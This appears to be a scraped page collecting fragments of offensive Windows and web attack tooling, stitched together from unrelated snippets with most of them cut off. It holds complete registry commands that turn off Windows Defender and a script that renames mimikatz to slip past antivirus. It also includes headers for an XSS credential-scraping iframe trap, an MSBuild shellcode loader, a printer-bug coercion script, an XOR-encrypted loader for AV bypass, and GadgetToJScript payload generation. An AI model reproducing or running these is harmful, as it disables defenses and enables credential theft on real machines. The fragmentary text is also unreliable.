23 network23

Let's turn Any .NET Application into an LOL Bin

We can do this by experimenting with .config files.

Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name

In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.

We do this by directing the application to read a config file we provide.

Windows 10 Disable Virus and Threat Protections

:: Turn Off Windows Defender
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f

:: Cloud-protection level

	alert('Click ok when you\'re ready to enter iframe trap');

	// Example Credential scraper and
	// XSS iframe trap. Load from whatever
	// page has the reflected/stored XSS vuln
	// trap the user in an iframe of the app.
	// Frame the login page, and copy out the
	// username and password fields.
	// @hoodoer

	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes x64 shellcode. -->
	<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
	<!-- Save This File And Execute The Above Command -->
	<!-- Author: Casey Smith, Twitter: @subTee -->
	<!-- License: BSD 3-Clause -->
	<Target Name="Hello">
	<ClassExample />
	</Target>
	<UsingTask

	#!/bin/bash
	###
	### my-script — does one thing well
	###
	### Usage:
	### my-script <input> <output>
	###
	### Options:
	### <input> Input file to read.
	### <output> Output file to write. Use '-' for stdout.

	#!/usr/bin/env python
	# originally by 3xocyte, modified by agsolino after native MS-RPRN functionality was added to impacket
	# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
	# some code from https://www.exploit-db.com/exploits/2879/

	import os
	import sys
	import argparse
	import binascii
	import ConfigParser

	/*
	Author: Arno0x0x, Twitter: @Arno0x0x
	Completely based on @Flangvik netloader

	This partial rewrite of @Flangvik Netloader includes the following changes:

	- Allow loading of an XOR encrypted binary to bypass antiviruses
	To encrypt the initial binary you can use my Python transformFile.py script.
	Example: ./transformFile.py -e xor -k mightyduck -i Rubeus.bin -o Rubeus.xor

	# This script downloads and slightly "obfuscates" the mimikatz project.
	# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ...,
	# so removing them from the project before compiling gets us past most of the AV solutions.
	# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
	# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.

	git clone https://github.com/gentilkiwi/mimikatz.git windows
	mv windows/mimikatz windows/candycrush
	find windows/ -type f -print0 \| xargs -0 sed -i 's/mimikatz/candycrush/g'
	find windows/ -type f -print0 \| xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'

	#! /usr/bin/env python3

	#
	# Requires Python 3.7+ & aiohttp (speedups recommended)
	# pip3 install aiohttp[speedups]
	#

	import sys
	import asyncio
	import aiohttp

	# Command to generate HTA code using GadgetsToJScript
	GadgetToJScript.exe -w hta

	# Command to generate JS code using GadgetsToJScript
	GadgetToJScript.exe -w js

	# Command to generate VBS code using GadgetsToJScript
	GadgetToJScript.exe -w vbs

	# Command to generate VBA code using GadgetsToJScript